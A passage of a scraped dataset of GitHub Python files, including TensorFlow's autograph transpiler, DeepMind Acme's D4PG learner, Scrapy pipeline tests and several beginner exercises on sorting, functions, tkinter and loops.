result\n","repo_name":"tensorflow/tensorflow","sub_path":"tensorflow/python/checkpoint/checkpoint_options.py","file_name":"checkpoint_options.py","file_ext":"py","file_size_in_byte":3982,"program_lang":"python","lang":"en","doc_type":"code","stars":178918,"dataset":"github-code","pt":"18"} +{"seq_id":"22763436802","text":"import sys\n\nn, m = map(int, sys.stdin.readline().rstrip().split())\nINF = int(1e9)\ngraph = [[INF] * (n+1) for _ in range(n+1)]\n\nfor i in range(1, n+1):\n graph[i][i] = 0\n\nfor _ in range(m):\n a, b = map(int, sys.stdin.readline().rstrip().split())\n graph[a][b] = 1\n # graph[b][a] = 1\n\ndef floyd(n, graph):\n for k in range(1, n+1):\n for i in range(1, n+1):\n for j in range(1, n+1):\n if graph[i][j] > graph[i][k] + graph[k][j]:\n graph[i][j] = graph[i][k] + graph[k][j]\n return graph\n\n# end 번호로 도착 가능한 번호\ndef inbound(graph, end):\n idx = []\n for index in range(1, len(result)):\n if 0 < graph[index][end] < INF:\n idx.append(index)\n return idx\n\n# start 번호 에서 갈수 있는 번호\ndef outbound(graph, start):\n idx = []\n for index, row in enumerate(graph[start]):\n if 0 < row < INF:\n idx.append(index)\n return idx\n\nresult = floyd(n, graph)\n# for row in result:\n# print(row)\ncnt = 0\ntotal_sum = sum([i for i in range(1, n+1)])\n\nfor i in range(1, n+1):\n inbound_lst = inbound(result, i)\n outbound_lst = outbound(result, i)\n if sum(inbound_lst + outbound_lst) == total_sum - i:\n cnt += 1\nprint(cnt)\n\n\n# 6 6\n# 1 5\n# 3 4\n# 4 2\n# 4 6\n# 5 2\n# 5 4\n# 4번에서 갈수 있는 번호 : 2, 6\n# 4번으로 갈수 있는 번호 : 1, 3, 5","repo_name":"philhoonoh/boostcamp_coding_test_study","sub_path":"6_shortest_path/2_others/0_정확한 순위.py","file_name":"0_정확한 순위.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33529128751","text":"import random\n\nunordered = random.sample(range(10), 10)\nrandom.shuffle(unordered)\n\nprint(unordered)\nordered = []\n\nwhile len(unordered) > 0:\n lowest = unordered[0]\n for i in unordered:\n if(i < lowest):\n lowest = i\n ordered.append(lowest)\n unordered.remove(lowest)\n\nprint(ordered)\n","repo_name":"sarah-mcculley/python-programming","sub_path":"ManualSort/ManualSort-smcculley.py","file_name":"ManualSort-smcculley.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4000035724","text":"import inspect\nimport threading\nimport types\n\nimport gast\n\nfrom tensorflow.python.autograph.pyct import cache\nfrom tensorflow.python.autograph.pyct import inspect_utils\nfrom tensorflow.python.autograph.pyct import loader\nfrom tensorflow.python.autograph.pyct import naming\nfrom tensorflow.python.autograph.pyct import origin_info\nfrom tensorflow.python.autograph.pyct import parser\nfrom tensorflow.python.autograph.pyct import templates\nfrom tensorflow.python.autograph.pyct import transformer\nfrom tensorflow.python.autograph.utils import ag_logging as logging\n\n\ndef _wrap_into_factory(nodes, entity_name, inner_factory_name,\n outer_factory_name, closure_vars, factory_args,\n future_features):\n \"\"\"Wraps an AST into the body of a factory with consistent lexical context.\n\n The AST is expected to define some symbol with a name given by `entity_name`.\n\n This mechanism ensures that the resulting transformed entity has lexical\n scoping identical to that of the source entity, while allowing extra\n parametrization.\n\n Two nested factories achieve the following:\n\n 1. The inner factory dynamically creates the entity represented by `nodes`.\n 2. The inner factory is parametrized by a custom set of arguments.\n 3. The inner factory has a closure identical to that of the transformed\n entity.\n 4. The inner factory has local variables named like `args`, which `nodes` may\n use as additional parameters.\n 5. The inner factory returns the variables given by `entity_name`.\n 6. The outer factory is niladic.\n 7. The outer factory has no closure.\n 8. The outer factory creates the necessary lexical scope for the inner\n factory, so that the loaded code has the given configuration for\n closure/globals.\n 9. The outer factory returns the inner factory.\n\n Roughly speaking, the following code is generated:\n\n from __future__ import future_feature_1\n from __future__ import future_feature_2\n ...\n\n def outer_factory():\n closure_var_1 = None\n closure_var_2 = None\n ...\n\n def inner_factory(arg_1, arg_2, ...):\n <>\n return entity\n\n return inner_factory\n\n The lexical scoping is created using dummy symbol declarations which create\n local variables in the body of the outer factory, so that the Python parser\n correctly marks them as free non-global variables upon load (that is, it\n creates cell slots for each symbol. These symbols are initialized with None,\n but their values are not expected to be used; instead, the caller is expected\n to replace them with the cells of the source entity. For more details, see:\n https://docs.python.org/3/reference/executionmodel.html#binding-of-names\n\n Args:\n nodes: Tuple[ast.AST], the source code to wrap.\n entity_name: Union[Text, ast.AST], the name of the principal entity that\n `nodes` define.\n inner_factory_name: Text, the name of the inner factory.\n outer_factory_name: Text, the name of the outer factory.\n closure_vars: Iterable[Text], names of the closure variables for the inner\n factory.\n factory_args: Iterable[Text], names of additional arguments for the\n inner factory. Useful to configure variables that the converted code can\n use. Typically, these are modules.\n future_features: Iterable[Text], names of future statements to associate the\n code with.\n\n Returns:\n ast.AST\n \"\"\"\n dummy_closure_defs = []\n for var_name in closure_vars:\n template = \"\"\"\n var_name = None\n \"\"\"\n dummy_closure_defs.extend(templates.replace(template, var_name=var_name))\n\n if future_features:\n future_imports = gast.ImportFrom(\n module='__future__',\n names=[gast.alias(name=name, asname=None) for name in future_features],\n level=0)\n else:\n future_imports = []\n\n factory_args = [\n gast.Name(name, ctx=gast.Param(), annotation=None, type_comment=None)\n for name in factory_args\n ]\n\n template = \"\"\"\n future_imports\n def outer_factory_name():\n dummy_closure_defs\n def inner_factory_name(factory_args):\n entity_defs\n return entity_name\n return inner_factory_name\n \"\"\"\n return templates.replace(\n template,\n dummy_closure_defs=dummy_closure_defs,\n entity_defs=nodes,\n entity_name=entity_name,\n factory_args=factory_args,\n future_imports=future_imports,\n inner_factory_name=inner_factory_name,\n outer_factory_name=outer_factory_name)\n\n\nclass _PythonFnFactory(object):\n \"\"\"Helper object that wraps a Python function factory.\"\"\"\n\n def __init__(self, name, freevars, extra_locals):\n \"\"\"Creates a new factory for a Python function.\n\n Args:\n name: The function name.\n freevars: The list of non-global free variables for the function.\n extra_locals: Dict[Text, Any], names and values for custom variables that\n are accessible to the generated code as local variables.\n \"\"\"\n self._name = name\n self._freevars = freevars\n self._extra_locals = extra_locals\n\n self._unbound_factory = None\n self.module = None\n self.source_map = None\n\n def create(self,\n nodes,\n namer,\n inner_factory_name='inner_factory',\n outer_factory_name='outer_factory',\n future_features=()):\n \"\"\"Initializes a function.\"\"\"\n if self._unbound_factory is not None:\n raise ValueError('double initialization; create a new object instead')\n\n inner_factory_name = namer.new_symbol(inner_factory_name, ())\n outer_factory_name = namer.new_symbol(outer_factory_name, ())\n nodes = _wrap_into_factory(nodes, self._name, inner_factory_name,\n outer_factory_name, self._freevars,\n self._extra_locals.keys(), future_features)\n\n module, _, source_map = loader.load_ast(\n nodes, include_source_map=True)\n outer_factory = getattr(module, outer_factory_name)\n self._unbound_factory = outer_factory()\n self.module = module\n self.source_map = source_map\n\n def instantiate(self,\n globals_,\n closure,\n defaults=None,\n kwdefaults=None):\n \"\"\"Creates a new function instance.\"\"\"\n if self._unbound_factory is None:\n raise ValueError('call create first')\n\n factory_code = self._unbound_factory.__code__\n factory_freevars = factory_code.co_freevars\n closure_map = dict(zip(self._freevars, closure))\n factory_closure = tuple(\n closure_map[name] for name in factory_code.co_freevars)\n if len(factory_closure) != len(closure):\n raise ValueError(\n 'closure mismatch, requested {}, but source function had {}'.format(\n self._freevars, factory_freevars))\n\n bound_factory = types.FunctionType(\n code=factory_code,\n globals=globals_,\n name=self._name,\n argdefs=(),\n closure=factory_closure)\n\n # The lint override is a false positive.\n new_fn = bound_factory(**self._extra_locals) # pylint:disable=not-callable\n\n if defaults:\n new_fn.__defaults__ = defaults\n if kwdefaults:\n new_fn.__kwdefaults__ = kwdefaults\n\n return new_fn\n\n\nclass GenericTranspiler(object):\n \"\"\"A generic transpiler for Python functions.\n\n Its interface is the `transform` API, which can process Python function\n objects. Internally, it handles parsing.\n\n Users typically subclass this, customizing the `transform_ast` method. The\n output of transformed_ast is returned directly by `transform`. Existing\n methods like `transform_function` may also be overloaded.\n\n Example:\n\n class MyTransformer(GenericTranspiler):\n\n def transform_ast(self, node, ctx):\n result = <>\n return result\n\n transformer = MyTransfomer()\n\n result = transformer.transform(f, ...)\n # result is the output\n \"\"\"\n\n def get_transformed_name(self, node):\n \"\"\"Returns a name for the output function. Subclasses may override this.\"\"\"\n if isinstance(node, gast.Lambda):\n return 'lam'\n elif isinstance(node, gast.FunctionDef):\n return node.name\n raise ValueError('Unknown node type {}'.format(node))\n\n def transform_ast(self, node, ctx):\n \"\"\"Performs an actual transformation of a function's AST.\n\n Subclasses must implement this method, and do not usually call it.\n\n Args:\n node: One or more ast.AST nodes representing the AST to be transformed.\n ctx: transformer.Context.\n \"\"\"\n raise NotImplementedError('subclasses must override this')\n\n def transform(self, obj, user_context):\n \"\"\"Transforms a Python object.\n\n Users typically call this method.\n\n Args:\n obj: A Python object, function, type, etc.\n user_context: An opaque object (may be None) that is forwarded to\n transform_ast, through the ctx.user attribute.\n Returns:\n The result of calling transform_function.\n\n Raises:\n NotImplementedError: if the type of obj is not handled.\n \"\"\"\n if inspect.isfunction(obj) or inspect.ismethod(obj):\n return self.transform_function(obj, user_context)\n\n raise NotImplementedError('Non-function: {}'.format(type(obj)))\n\n def _erase_arg_defaults(self, node):\n \"\"\"Erase arg default expressions, which would otherwise be unbound.\"\"\"\n args = node.args\n for i in range(len(args.defaults)):\n args.defaults[i] = parser.parse_expression('None')\n for i, d in enumerate(args.kw_defaults):\n if d is not None:\n args.kw_defaults[i] = parser.parse_expression('None')\n return node\n\n def transform_module(self, mod, user_context):\n \"\"\"Transforms a module.\n\n Subclasses may override this method. The return value is opaque.\n\n The method receives the original AST. The result is passed as-is to the\n output of `transform`.\n\n Args:\n mod: A Python module.\n user_context: An opaque object (may be None) that is forwarded to\n transform_ast, through the ctx.user attribute.\n Returns:\n List[Tuple[Any, Any]]. By default it returns the output of transform_ast,\n evaluated on each supported member, other than modules, together with a\n `transformer.Context` containing information about the transformation\n process.\n \"\"\"\n result = []\n for member in mod.__dict__.values():\n if inspect.ismodule(member):\n continue # Not transforming modules recursively.\n try:\n result.append(self.transform(member, user_context))\n except NotImplementedError:\n pass # Skip unsupported elements.\n return result\n\n def transform_function(self, fn, user_context):\n \"\"\"Transforms a function.\n\n Subclasses may override this method. The return value is opaque.\n\n The method receives the original AST. The result is passed as-is to the\n output of `transform`.\n\n Args:\n fn: A function or lambda.\n user_context: An opaque object (may be None) that is forwarded to\n transform_ast, through the ctx.user attribute.\n Returns:\n Tuple[Any, Any]. By default it returns the output of transform_ast,\n together with a `transformer.Context` containing information about the\n transformation process.\n \"\"\"\n future_features = inspect_utils.getfutureimports(fn)\n node, source = parser.parse_entity(fn, future_features=future_features)\n logging.log(3, 'Source code of %s:\\n\\n%s\\n', fn, source)\n\n origin_info.resolve_entity(node, source, fn)\n\n namespace = inspect_utils.getnamespace(fn)\n namer = naming.Namer(namespace)\n new_name = namer.new_symbol(self.get_transformed_name(node), ())\n entity_info = transformer.EntityInfo(\n name=new_name,\n source_code=source,\n source_file='',\n future_features=future_features,\n namespace=namespace)\n context = transformer.Context(entity_info, namer, user_context)\n\n node = self._erase_arg_defaults(node)\n result = self.transform_ast(node, context)\n\n return result, context\n\n\nclass PyToPy(GenericTranspiler):\n \"\"\"A generic Python-to-Python transpiler.\n\n Its `transform` method offers a function-in, function-out interface.\n Internally, it takes care of parsing, caching and loading of the translated\n code.\n\n Users typically subclass this, overriding `transform_ast`.\n\n Usually, instances of this class are singletons, since each instance manages\n its own cache. The caching can be controlled by overriding `get_caching_key`.\n\n Example:\n\n class MyTransformer(PyToPy):\n\n def transform_ast(self, node, ctx):\n node = <>\n return node\n\n transformer = MyTransfomer()\n\n new_f, module, source_map = transformer.transform_function(f, ...)\n # new_f is a function with signature identical to f\n\n The transformed function has access to the same namespace as the original\n function. To allow access to internal APIs, users may inject additional\n symbols by overriding `get_extra_locals`.\n \"\"\"\n\n def __init__(self):\n self._cache_lock = threading.RLock()\n self._cache = cache.CodeObjectCache()\n\n def get_extra_locals(self):\n \"\"\"Returns extra static local variables to be made to transformed code.\n\n Subclasses must override this.\n\n Returns:\n extra_locals: A Dict[Text, Any] containing additional variables to make\n available to the transformed code.\n \"\"\"\n raise NotImplementedError('subclasses must override this')\n\n def get_caching_key(self, user_context):\n \"\"\"Returns a unique key to use for caching.\n\n Subclasses must override this.\n\n Calls made to `transform_function` with functions that have the same code\n object and caching key will return a cached instance on subsequent\n invocations.\n\n Args:\n user_context: The context object which was passed to `transform`.\n\n Returns:\n extra_locals: A hashable.\n \"\"\"\n raise NotImplementedError('subclasses must override this')\n\n def _cached_factory(self, fn, cache_subkey):\n cached_factory = self._cache[fn][cache_subkey]\n logging.log(3, 'Cache hit for %s subkey %s: %s', fn, cache_subkey,\n cached_factory)\n return cached_factory\n\n def transform_function(self, fn, user_context):\n \"\"\"Transforms a function. See GenericTranspiler.trasnform_function.\n\n This overload wraps the parent's `transform_function`, adding caching and\n facilities to instantiate the output as a Python object. It also\n adds facilities to make new symbols available to the generated Python code,\n visible as local variables - see `get_extra_locals`.\n\n Args:\n fn: A function or lambda.\n user_context: An opaque object (may be None) that is forwarded to\n transform_ast, through the ctx.user attribute.\n Returns:\n A tuple:\n * A function or lambda with the same signature and closure as `fn`\n * The temporary module into which the transformed function was loaded\n * The source map as a\n Dict[origin_info.LineLocation, origin_info.OriginInfo]\n \"\"\"\n cache_subkey = self.get_caching_key(user_context)\n\n if self._cache.has(fn, cache_subkey):\n # Fast path: use a lock-free check.\n factory = self._cached_factory(fn, cache_subkey)\n\n else:\n with self._cache_lock:\n # Check again under lock.\n if self._cache.has(fn, cache_subkey):\n factory = self._cached_factory(fn, cache_subkey)\n\n else:\n logging.log(1, '%s is not cached for subkey %s', fn, cache_subkey)\n # TODO(mdan): Confusing overloading pattern. Fix.\n nodes, ctx = super(PyToPy, self).transform_function(fn, user_context)\n\n if isinstance(nodes, gast.Lambda):\n nodes = gast.Assign(\n targets=[\n gast.Name(\n ctx.info.name,\n ctx=gast.Store(),\n annotation=None,\n type_comment=None)\n ],\n value=nodes)\n else:\n nodes.name = ctx.info.name\n\n if logging.has_verbosity(2):\n logging.log(2, 'Transformed %s:\\n\\n%s\\n', fn, parser.unparse(nodes))\n\n factory = _PythonFnFactory(\n ctx.info.name, fn.__code__.co_freevars, self.get_extra_locals())\n factory.create(\n nodes, ctx.namer, future_features=ctx.info.future_features)\n self._cache[fn][cache_subkey] = factory\n\n transformed_fn = factory.instantiate(\n globals_=fn.__globals__,\n closure=fn.__closure__ or (),\n defaults=fn.__defaults__,\n kwdefaults=getattr(fn, '__kwdefaults__', None))\n return transformed_fn, factory.module, factory.source_map\n","repo_name":"tensorflow/tensorflow","sub_path":"tensorflow/python/autograph/pyct/transpiler.py","file_name":"transpiler.py","file_ext":"py","file_size_in_byte":16749,"program_lang":"python","lang":"en","doc_type":"code","stars":178918,"dataset":"github-code","pt":"18"} +{"seq_id":"26516793705","text":"import time\nfrom typing import Dict, Iterator, List, NamedTuple, Optional, Tuple\n\nimport acme\nfrom acme import types\nfrom acme.jax import networks as networks_lib\nfrom acme.jax import utils\nfrom acme.utils import counting\nfrom acme.utils import loggers\nimport jax\nimport jax.numpy as jnp\nimport optax\nimport reverb\nimport rlax\n\n_PMAP_AXIS_NAME = 'data'\n\n\nclass TrainingState(NamedTuple):\n \"\"\"Contains training state for the learner.\"\"\"\n policy_params: networks_lib.Params\n target_policy_params: networks_lib.Params\n critic_params: networks_lib.Params\n target_critic_params: networks_lib.Params\n policy_opt_state: optax.OptState\n critic_opt_state: optax.OptState\n steps: int\n\n\nclass D4PGLearner(acme.Learner):\n \"\"\"D4PG learner.\n\n This is the learning component of a D4PG agent. IE it takes a dataset as input\n and implements update functionality to learn from this dataset.\n \"\"\"\n\n _state: TrainingState\n\n def __init__(self,\n policy_network: networks_lib.FeedForwardNetwork,\n critic_network: networks_lib.FeedForwardNetwork,\n random_key: networks_lib.PRNGKey,\n discount: float,\n target_update_period: int,\n iterator: Iterator[reverb.ReplaySample],\n policy_optimizer: Optional[optax.GradientTransformation] = None,\n critic_optimizer: Optional[optax.GradientTransformation] = None,\n clipping: bool = True,\n counter: Optional[counting.Counter] = None,\n logger: Optional[loggers.Logger] = None,\n jit: bool = True,\n num_sgd_steps_per_step: int = 1):\n\n def critic_mean(\n critic_params: networks_lib.Params,\n observation: types.NestedArray,\n action: types.NestedArray,\n ) -> jnp.ndarray:\n # We add batch dimension to make sure batch concat in critic_network\n # works correctly.\n observation = utils.add_batch_dim(observation)\n action = utils.add_batch_dim(action)\n # Computes the mean action-value estimate.\n logits, atoms = critic_network.apply(critic_params, observation, action)\n logits = utils.squeeze_batch_dim(logits)\n probabilities = jax.nn.softmax(logits)\n return jnp.sum(probabilities * atoms, axis=-1)\n\n def policy_loss(\n policy_params: networks_lib.Params,\n critic_params: networks_lib.Params,\n o_t: types.NestedArray,\n ) -> jnp.ndarray:\n # Computes the discrete policy gradient loss.\n dpg_a_t = policy_network.apply(policy_params, o_t)\n grad_critic = jax.vmap(\n jax.grad(critic_mean, argnums=2), in_axes=(None, 0, 0))\n dq_da = grad_critic(critic_params, o_t, dpg_a_t)\n dqda_clipping = 1. if clipping else None\n batch_dpg_learning = jax.vmap(rlax.dpg_loss, in_axes=(0, 0, None))\n loss = batch_dpg_learning(dpg_a_t, dq_da, dqda_clipping)\n return jnp.mean(loss)\n\n def critic_loss(\n critic_params: networks_lib.Params,\n state: TrainingState,\n transition: types.Transition,\n ):\n # Computes the distributional critic loss.\n q_tm1, atoms_tm1 = critic_network.apply(critic_params,\n transition.observation,\n transition.action)\n a = policy_network.apply(state.target_policy_params,\n transition.next_observation)\n q_t, atoms_t = critic_network.apply(state.target_critic_params,\n transition.next_observation, a)\n batch_td_learning = jax.vmap(\n rlax.categorical_td_learning, in_axes=(None, 0, 0, 0, None, 0))\n loss = batch_td_learning(atoms_tm1, q_tm1, transition.reward,\n discount * transition.discount, atoms_t, q_t)\n return jnp.mean(loss)\n\n def sgd_step(\n state: TrainingState,\n transitions: types.Transition,\n ) -> Tuple[TrainingState, Dict[str, jnp.ndarray]]:\n\n # TODO(jaslanides): Use a shared forward pass for efficiency.\n policy_loss_and_grad = jax.value_and_grad(policy_loss)\n critic_loss_and_grad = jax.value_and_grad(critic_loss)\n\n # Compute losses and their gradients.\n policy_loss_value, policy_gradients = policy_loss_and_grad(\n state.policy_params, state.critic_params,\n transitions.next_observation)\n critic_loss_value, critic_gradients = critic_loss_and_grad(\n state.critic_params, state, transitions)\n\n # Average over all devices.\n policy_loss_value, policy_gradients = jax.lax.pmean(\n (policy_loss_value, policy_gradients), _PMAP_AXIS_NAME)\n critic_loss_value, critic_gradients = jax.lax.pmean(\n (critic_loss_value, critic_gradients), _PMAP_AXIS_NAME)\n\n # Get optimizer updates and state.\n policy_updates, policy_opt_state = policy_optimizer.update( # pytype: disable=attribute-error\n policy_gradients, state.policy_opt_state)\n critic_updates, critic_opt_state = critic_optimizer.update( # pytype: disable=attribute-error\n critic_gradients, state.critic_opt_state)\n\n # Apply optimizer updates to parameters.\n policy_params = optax.apply_updates(state.policy_params, policy_updates)\n critic_params = optax.apply_updates(state.critic_params, critic_updates)\n\n steps = state.steps + 1\n\n # Periodically update target networks.\n target_policy_params, target_critic_params = optax.periodic_update( # pytype: disable=wrong-arg-types # numpy-scalars\n (policy_params, critic_params),\n (state.target_policy_params, state.target_critic_params), steps,\n self._target_update_period)\n\n new_state = TrainingState(\n policy_params=policy_params,\n critic_params=critic_params,\n target_policy_params=target_policy_params,\n target_critic_params=target_critic_params,\n policy_opt_state=policy_opt_state,\n critic_opt_state=critic_opt_state,\n steps=steps,\n )\n\n metrics = {\n 'policy_loss': policy_loss_value,\n 'critic_loss': critic_loss_value,\n }\n\n return new_state, metrics\n\n # General learner book-keeping and loggers.\n self._counter = counter or counting.Counter()\n self._logger = logger or loggers.make_default_logger(\n 'learner',\n asynchronous=True,\n serialize_fn=utils.fetch_devicearray,\n steps_key=self._counter.get_steps_key())\n\n # Necessary to track when to update target networks.\n self._target_update_period = target_update_period\n\n # Create prefetching dataset iterator.\n self._iterator = iterator\n\n # Maybe use the JIT compiler.\n sgd_step = utils.process_multiple_batches(sgd_step, num_sgd_steps_per_step)\n self._sgd_step = (\n jax.pmap(sgd_step, _PMAP_AXIS_NAME, devices=jax.devices())\n if jit else sgd_step)\n\n # Create the network parameters and copy into the target network parameters.\n key_policy, key_critic = jax.random.split(random_key)\n initial_policy_params = policy_network.init(key_policy)\n initial_critic_params = critic_network.init(key_critic)\n initial_target_policy_params = initial_policy_params\n initial_target_critic_params = initial_critic_params\n\n # Create optimizers if they aren't given.\n critic_optimizer = critic_optimizer or optax.adam(1e-4)\n policy_optimizer = policy_optimizer or optax.adam(1e-4)\n\n # Initialize optimizers.\n initial_policy_opt_state = policy_optimizer.init(initial_policy_params) # pytype: disable=attribute-error\n initial_critic_opt_state = critic_optimizer.init(initial_critic_params) # pytype: disable=attribute-error\n\n # Create the initial state and replicate it in all devices.\n self._state = utils.replicate_in_all_devices(\n TrainingState(\n policy_params=initial_policy_params,\n target_policy_params=initial_target_policy_params,\n critic_params=initial_critic_params,\n target_critic_params=initial_target_critic_params,\n policy_opt_state=initial_policy_opt_state,\n critic_opt_state=initial_critic_opt_state,\n steps=0,\n ))\n\n # Do not record timestamps until after the first learning step is done.\n # This is to avoid including the time it takes for actors to come online and\n # fill the replay buffer.\n self._timestamp = None\n\n def step(self):\n # Sample from replay and pack the data in a Transition.\n sample = next(self._iterator)\n transitions = types.Transition(*sample.data)\n\n self._state, metrics = self._sgd_step(self._state, transitions)\n\n # Take the metrics from the first device, since they've been pmeaned over\n # all devices and are therefore identical.\n metrics = utils.get_from_first_device(metrics)\n\n # Compute elapsed time.\n timestamp = time.time()\n elapsed_time = timestamp - self._timestamp if self._timestamp else 0\n self._timestamp = timestamp\n\n # Increment counts and record the current time\n counts = self._counter.increment(steps=1, walltime=elapsed_time)\n\n # Attempts to write the logs.\n self._logger.write({**metrics, **counts})\n\n def get_variables(self, names: List[str]) -> List[networks_lib.Params]:\n variables = {\n 'policy': self._state.target_policy_params,\n 'critic': self._state.target_critic_params,\n }\n return utils.get_from_first_device([variables[name] for name in names])\n\n def save(self) -> TrainingState:\n return utils.get_from_first_device(self._state)\n\n def restore(self, state: TrainingState):\n self._state = utils.replicate_in_all_devices(state)\n","repo_name":"deepmind/acme","sub_path":"acme/agents/jax/d4pg/learning.py","file_name":"learning.py","file_ext":"py","file_size_in_byte":9646,"program_lang":"python","lang":"en","doc_type":"code","stars":3100,"dataset":"github-code","pt":"18"} +{"seq_id":"602786306","text":"from unittest.mock import patch\r\n\r\nfrom django.db import transaction\r\nfrom django.test import TestCase\r\nfrom scrapy.crawler import Crawler\r\nfrom scrapy.statscollectors import StatsCollector\r\nfrom scrapy.utils.project import get_project_settings\r\n\r\nfrom bulletin.models import Bulletin\r\nfrom scraper.scraper.pipelines import ScraperPipeline\r\nfrom scraper.scraper.spiders.bulletin import BulletinSpider\r\nfrom scraper.tests.helpers import create_processed_items\r\n\r\n\r\nclass ScraperPipelineTest(TestCase):\r\n\r\n def setUp(self):\r\n self.spider = BulletinSpider(limit=1)\r\n crawler = Crawler(BulletinSpider, settings=get_project_settings())\r\n stats = StatsCollector(crawler)\r\n self.item_pipeline = ScraperPipeline(stats=stats)\r\n self.total_items = 5\r\n self.items = create_processed_items(self.total_items)\r\n\r\n def test_pipeline_successfully_saves_items(self):\r\n for item in self.items:\r\n self.item_pipeline.process_item(item, self.spider)\r\n\r\n self.assertEqual(Bulletin.objects.count(), self.total_items)\r\n self.assertEqual(\r\n self.item_pipeline.stats.get_value('items_saved_to_db'),\r\n self.total_items\r\n )\r\n\r\n @patch('scraper.scraper.pipelines.logging.warning')\r\n def test_pipeline_discards_duplicate_items(self, mock_warning):\r\n # Duplicate an item\r\n self.items[1] = self.items[0]\r\n for item in self.items:\r\n with transaction.atomic():\r\n self.item_pipeline.process_item(item, self.spider)\r\n\r\n self.assertEqual(Bulletin.objects.count(), self.total_items - 1)\r\n self.assertEqual(\r\n self.item_pipeline.stats.get_value('items_saved_to_db'),\r\n self.total_items - 1\r\n )\r\n self.assertEqual(\r\n self.item_pipeline.stats.get_value('items_duplicate'),\r\n 1\r\n )\r\n\r\n duplicate_url = self.items[0]['url']\r\n warning_message = f'Unable to save bulletin with URL: {duplicate_url}'\r\n mock_warning.assert_called_with(warning_message)\r\n\r\n @patch('scraper.scraper.pipelines.logging.error')\r\n @patch('scraper.scraper.pipelines.Bulletin.save')\r\n def test_unexpected_errors_when_processing(self, mock_save, mock_error):\r\n # Set ok side effects except for one instance\r\n side_effect = [None for i in range(self.total_items)]\r\n side_effect[2] = ValueError\r\n mock_save.side_effect = side_effect\r\n\r\n for item in self.items:\r\n self.item_pipeline.process_item(item, self.spider)\r\n\r\n self.assertEqual(mock_save.call_count, self.total_items)\r\n self.assertTrue(mock_error.called)\r\n","repo_name":"ralphqq/ph-earthquake-dashboard","sub_path":"scraper/tests/test_pipelines.py","file_name":"test_pipelines.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17792069153","text":"'''\r\nFunctions - a block of organized , reusable code to perform a particular action.\r\nTypes of functions :\r\n1. Built-in Function - print() , input() etc.\r\n2. User-defined Functions \r\n'''\r\n\r\n#Function to calculate the factorial , with required parameter.\r\ndef factorial(n): #Function definition with parameter\r\n fact = 1\r\n\r\n for i in range(1,n+1):\r\n fact *= i\r\n return fact #return statement\r\n\r\nprint(factorial(5)) #Calling a function with arguments\r\n\r\n#Function with Default Arguments\r\ndef func(name , age = 35):\r\n print(\"Name:\",name)\r\n print(\"Age:\",age)\r\n\r\nfunc(\"Ashwini\" , 63)\r\nfunc(\"Prachi\")\r\n\r\n#Functions with Keyword arguments\r\ndef func1(name , age = 23 , city = \"Delhi\"):\r\n print(\"Name:\",name)\r\n print(\"Age:\",age)\r\n print(\"City:\",city)\r\n\r\nfunc1(\"Ashwini\" , 26)\r\nfunc1(\"Prachi\")\r\nfunc1(\"Rahul\" , city = \"Bengaluru\")\r\n\r\n#Function with Variable length parameters\r\ndef func2(*args):\r\n print(\"Variable Length keyword functions:\",args)\r\n\r\nfunc2(1,2,3,4,5,67,8)\r\n","repo_name":"Ashwini-Dubey/TestAutomation","sub_path":"Coding/Python/Introduction_To_Python/Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"29147624389","text":"n=input()\nn=n.lower()\nn=n.split( )\ns='aeiou'\nk=[]\nm=[]\nfor i in n:\n for j in i:\n if j in s:\n k.append(j)\nfor i in s:\n if i not in k:\n m.append(i)\nif m==[]:\n print(0)\nelse:\n l=sorted(m)\n print(*l)\n\n ","repo_name":"Farid7786/codemind-python","sub_path":"vowels_not_in_a_string.py","file_name":"vowels_not_in_a_string.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37444708813","text":"from tkinter import *\nfrom tkinter import ttk\n\nroot = Tk()\nroot.title('ComboBox app')\n\ncombobox_selection = StringVar(value='Choose a fruit')\ncounter = IntVar(value=0)\n\n\ndef show_selection():\n globals()\n counter.set(counter.get() + 1)\n if combobox_selection.get() != 'Choose a fruit':\n ttk.Label(text=combobox_selection.get()).grid(row=counter.get(), column=1)\n\n\ncombobox = ttk.Combobox(width=25, textvariable=combobox_selection)\ncombobox['values'] = ('Apple', 'Orange', 'Mango', 'Cashew', 'Papaya', 'Melon')\ncombobox.grid(row=0, column=1)\n\nttk.Label(text='Select your fruit').grid(row=0, column=0)\nttk.Button(text='Show Selection', command=show_selection).grid(row=1, column=0)\n\nroot.mainloop()\n","repo_name":"Minicoru/LearningPythonBeginner","sub_path":"ComboBox.py","file_name":"ComboBox.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74602582759","text":"class Solution:\n def isMonotonic(self, nums: List[int]) -> bool:\n increasing = False\n decreasing = False\n \n for i in range(1, len(nums)):\n if nums[i] > nums[i-1]:\n increasing = True\n elif nums[i] < nums[i-1]:\n decreasing = True\n \n if increasing == False and decreasing == False:\n return True\n return increasing != decreasing","repo_name":"Ayomipo18/Data-Structures-and-Algorithms-LeetCode","sub_path":"0896-monotonic-array/0896-monotonic-array.py","file_name":"0896-monotonic-array.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"41945689514","text":"#Loop que executa ações enquenato a condição for verdadeira, faz uma repetição com um numero de repeticoes definida ou infinita\n\nnotas = []\n\ncontador = 1\n\nwhile contador <= 5:\n codigo_aluno = input(\"RM: \")\n nota = float(input(\"Nota: \"))\n resultado = [codigo_aluno, nota]\n notas.append(resultado)\n\n contador = contador + 1\n\nprint(\"Quantidade de notas\", len(notas))","repo_name":"rafaeldeje/python-rules","sub_path":"python-rules/workspace/10-Repetições/While/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26062108384","text":"\"\"\"job application\n\nRevision ID: 7bb9d6ce548f\nRevises: 